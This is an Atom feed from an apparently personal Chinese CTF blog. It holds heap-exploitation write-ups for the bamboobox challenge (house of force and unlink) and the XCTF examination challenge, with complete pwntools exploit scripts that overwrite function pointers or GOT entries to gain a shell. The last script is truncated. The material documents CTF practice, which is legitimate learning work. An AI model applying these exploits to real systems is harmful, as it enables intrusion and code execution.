atom.xml

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Trick&#39;s Blog</title>
  
  
  <link href="https://trick.ink/atom.xml" rel="self"/>
  
  <link href="https://trick.ink/"/>
  <updated>2023-02-09T17:56:54.906Z</updated>
  <id>https://trick.ink/</id>
  
  <author>
    <name>Trick</name>
    
  </author>
  
  <generator uri="https://hexo.io/">Hexo</generator>
  
  <entry>
    <title>house of force</title>
    <link href="https://trick.ink/article/house%20of%20force/"/>
    <id>https://trick.ink/article/house%20of%20force/</id>
    <published>2022-05-28T11:53:26.000Z</published>
    <updated>2023-02-09T17:56:54.906Z</updated>
    
    <content type="html"><![CDATA[<h1 id="house-of-force"><a href="#house-of-force" class="headerlink" title="house of force"></a>house of force</h1><!-- 文章页 配置 --><h2 id="hitcontraining-bamboobox"><a href="#hitcontraining-bamboobox" class="headerlink" title="hitcontraining_bamboobox"></a>hitcontraining_bamboobox</h2><h3 id="基本功能"><a href="#基本功能" class="headerlink" title="基本功能"></a>基本功能</h3><ul><li>程序在开始时就申请了一个 chunk 用于存放两个函数指针</li><li>show </li><li>add：读取名字使用的是 <code>read</code> 函数，读取长度的参数是用户输入的 v2，而 read 的第三个参数是无符号整数，如果我们输入负数，就可以读取任意长度。所以这里存在<strong>任意长度堆溢出</strong>的漏洞。</li><li>change：重新输入 <code>name</code> 的长度进行写入，存在<strong>任意长度堆溢出</strong></li><li>remove：将对应物品的名字的大小置为 0，并将对应的 content 置为 NULL</li><li>magic 函数：读取 flag 并打印</li></ul><h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>覆盖某个指针为 magic 函数的指针，goodbye_message 函数在程序结束时调用，利用覆盖 goodbye_message 来控制程序流：</p><ol><li><p>申请一个 chunk</p><p><img src="/article/house%20of%20force/image-20211019162935944.png" alt="image-20211019162935944"></p></li><li><p>堆溢出修改 top chunk</p><p><img src="/article/house%20of%20force/image-20211019163644606.png" alt="image-20211019163644606"></p><p>目的地址是 <code>0xf87000</code> ，</p></li><li><p>向上申请 chunk，malloc（负数）</p><p>负数 =  0xf87000 - 0xf87050 - 0x10 = -96(-0x60)</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add(-<span class="number">0x60</span>,<span class="string">&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure><p><img src="/article/house%20of%20force/image-20211019164429485.png" alt="image-20211019164429485"></p><p>下一个申请的 chunk 地址为 0x15e7000，由于 size 检测，所以申请大小为 0x10</p></li><li><p>申请 0x10 的chunk，写入 magic_addr</p><p><img src="/article/house%20of%20force/image-20211019164702377.png" alt="image-20211019164702377"></p></li></ol><h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 process</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(<span class="string">&#x27;./bamboobox&#x27;</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">27833</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># elf = ELF(&#x27;./bamboobox&#x27;)</span></span><br><span class="line"><span class="comment"># libc = ELF(&#x27;./libc.so.6&#x27;)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Your choice:&#x27;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;idx: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,name</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Your choice:&#x27;</span>,<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;name:&#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;name of item:&#x27;</span>,<span class="built_in">str</span>(name))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,size,name</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Your choice:&#x27;</span>,<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;index of item:&#x27;</span>,<span class="built_in">str</span>(index))   </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;length of item name:&#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;name of the item:&#x27;</span>,name)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Your choice:&#x27;</span>,<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;index of item:&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">magic_addr = <span class="number">0x400D49</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x20</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x28</span> + <span class="string">&#x27;\xff&#x27;</span>*<span class="number">8</span></span><br><span class="line">edit(<span class="number">0</span>,<span class="built_in">len</span>(payload),payload)</span><br><span class="line"></span><br><span class="line">add(-<span class="number">0x60</span>,<span class="string">&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x10</span>,p64(magic_addr)*<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;Your choice:&#x27;</span>,<span class="string">&#x27;5&#x27;</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h3 id="Unlink"><a href="#Unlink" class="headerlink" title="Unlink"></a>Unlink</h3><p>这个题目的另一个解法</p><h4 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h4><ul><li>通过 unlink 把 chunk 移到存储 chunk 指针的内存处</li><li>覆盖 chunk 0 指针为 atoi 的 got 表地址并泄露。</li><li>覆盖 atoi 的 got 表为 system 函数地址</li><li>给出参数 ‘sh’，调用 atoi 函数拿 shell</li></ul><h4 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 process</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">2</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(<span class="string">&#x27;./bamboobox&#x27;</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">27833</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./bamboobox&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc/libc-2.23.so&#x27;</span>)</span><br><span class="line">atoi_got = elf.got[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Your choice:&#x27;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,name</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Your choice:&#x27;</span>,<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;name:&#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;name of item:&#x27;</span>,<span class="built_in">str</span>(name))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Your choice:&#x27;</span>,<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;index of item:&#x27;</span>,<span class="built_in">str</span>(index))   </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;length of item name:&#x27;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(content)))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;name of the item:&#x27;</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Your choice:&#x27;</span>,<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;index of item:&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">target = <span class="number">0x6020c8</span></span><br><span class="line">fd = target - <span class="number">0x18</span></span><br><span class="line">bk = target - <span class="number">0x10</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">&#x27;bbbb&#x27;</span>)</span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&#x27;cccc&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">0x30</span>)</span><br><span class="line">payload += p64(fd) + p64(bk)</span><br><span class="line">payload += <span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span></span><br><span class="line">payload += p64(<span class="number">0x30</span>) + p64(<span class="number">0x90</span>)</span><br><span class="line">edit(<span class="number">0</span>,payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0</span>)*<span class="number">2</span> + p64(<span class="number">0x30</span>) + p64(atoi_got)</span><br><span class="line">edit(<span class="number">0</span>,payload)</span><br><span class="line"></span><br><span class="line">show()</span><br><span class="line">atoi_addr = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">libc_base = atoi_addr - libc.sym[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">log.success(<span class="built_in">hex</span>(system_addr))</span><br><span class="line">log.success(<span class="built_in">hex</span>(atoi_addr))</span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,p64(system_addr))</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">house of force</summary>
    
    
    
    <category term="笔记" scheme="https://trick.ink/categories/%E7%AC%94%E8%AE%B0/"/>
    
    
  </entry>
  
  <entry>
    <title>XCTF-StartCTF</title>
    <link href="https://trick.ink/article/XCTF-StartCTF/"/>
    <id>https://trick.ink/article/XCTF-StartCTF/</id>
    <published>2022-04-16T03:16:06.000Z</published>
    <updated>2023-02-09T17:18:23.962Z</updated>
    
    <content type="html"><![CDATA[<h1 id="XCTF-StartCTF"><a href="#XCTF-StartCTF" class="headerlink" title="XCTF-StartCTF"></a>XCTF-StartCTF</h1><!-- 文章页 配置 --><h1 id="examination"><a href="#examination" class="headerlink" title="examination"></a>examination</h1><blockquote><p>ret2school once again<br>nc 124.70.130.92 60001</p></blockquote><h2 id="结构体"><a href="#结构体" class="headerlink" title="结构体"></a>结构体</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">student</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    __int64 *score_addr;</span><br><span class="line">    null;</span><br><span class="line">    __int64 *mode_addr;</span><br><span class="line">   <span class="keyword">int</span> pray_flag;</span><br><span class="line">    <span class="keyword">int</span> reward_flag;</span><br><span class="line">    </span><br><span class="line">&#125;S;</span><br><span class="line"><span class="comment">// size = 0x30</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">student_score</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    <span class="keyword">int</span> number_of_questions;</span><br><span class="line">    <span class="keyword">int</span> score;</span><br><span class="line">    <span class="keyword">char</span> *review_addr;</span><br><span class="line">    <span class="keyword">int</span> review_size;</span><br><span class="line">&#125;Ss;</span><br><span class="line"><span class="comment">// size = 0x20</span></span><br></pre></td></tr></table></figure><h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><ol><li>student_pray -&gt; teacher_score，减了10分之后造成整数溢出，满足<code>check for review</code>任意地址+1的条件</li><li>在<code>review_size</code>的地址+1，造成write溢出和show的溢出。</li><li>先打tcache，再onegadget到malloc_hook</li><li>teacher_6，触发malloc，getshell</li></ol><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;examination&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">25323</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;choice&gt;&gt; &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">########################### Teacher ##############################</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">num</span>):</span></span><br><span class="line">    cmd(<span class="number">1</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;questions: &#x27;</span>,<span class="built_in">str</span>(num))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">score</span>():</span></span><br><span class="line">    cmd(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write_a_review_first</span>(<span class="params">index,size,comment</span>):</span></span><br><span class="line">    cmd(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;which one? &gt; &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;size of comment: &#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;enter your comment:&#x27;</span>,comment)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write_a_review</span>(<span class="params">index,comment</span>):</span></span><br><span class="line">    cmd(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;which one? &gt; &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;enter your comment:&#x27;</span>,comment)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">parent</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">4</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;choose?\n&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">########################### Student ##############################</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_check</span>():</span></span><br><span class="line">    cmd(<span class="number">2</span>)</span><br><span class="line">    </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_pray</span>():</span></span><br><span class="line">    cmd(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_mode</span>(<span class="params">mode,score=<span class="literal">None</span></span>):</span></span><br><span class="line">    cmd(<span class="number">4</span>)</span><br><span class="line">    data = p.recvline()</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;100&quot;</span> <span class="keyword">in</span> data:</span><br><span class="line">        p.sendline(score)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        p.sendline(mode)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_changeid</span>(<span class="params">ID</span>):</span></span><br><span class="line">    cmd(<span class="number">6</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;input your id: &#x27;</span>,<span class="built_in">str</span>(ID))</span><br><span class="line"></span><br><span class="line"><span class="comment">#########################################################</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">studenttoTeacher</span>():</span></span><br><span class="line">    cmd(<span class="number">5</span>)</span><br><span class="line">    role(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">teachertoStudent</span>():</span></span><br><span class="line">    cmd(<span class="number">5</span>)</span><br><span class="line">    role(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">role</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;&lt;0.teacher/1.student&gt;: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">#########################################################</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p,&#x27;b *$rebase(0x1e0b)&#x27;)</span></span><br><span class="line"></span><br><span class="line">role(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">1</span>)</span><br><span class="line">teachertoStudent()</span><br><span class="line">student_pray()</span><br><span class="line">studenttoTeacher()</span><br><span class="line">score()</span><br><span class="line">write_a_review_first(<span class="number">0</span>,<span class="number">0x10</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span>)</span><br><span class="line">teachertoStudent()</span><br><span class="line">student_check()</span><br><span class="line">p.recvuntil(<span class="string">&#x27;reward! &#x27;</span>)</span><br><span class="line">heap_base = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>) - <span class="number">0x2a0</span></span><br><span class="line">log.success(<span class="string">&#x27;addr: &#x27;</span> + <span class="built_in">hex</span>(heap_base))</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;add 1 to wherever you want! addr: &#x27;</span>,<span class="built_in">str</span>(((heap_base+<span class="number">0x2e1</span>)*<span class="number">10</span>)))</span><br><span class="line"></span><br><span class="line">studenttoTeacher()</span><br><span class="line">add(<span class="number">2</span>)</span><br><span class="line">write_a_review_first(<span class="number">1</span>,<span class="number">0x80</span>,<span class="string">&#x27;b&#x27;</span>*<span class="number">0x10</span>)</span><br><span class="line">target_addr = heap_base + <span class="number">0x10</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x31</span>)</span><br><span class="line">payload += p64(heap_base+<span class="number">0x340</span>) + p64(<span class="number">0</span>)*<span class="number">4</span> + p64(<span 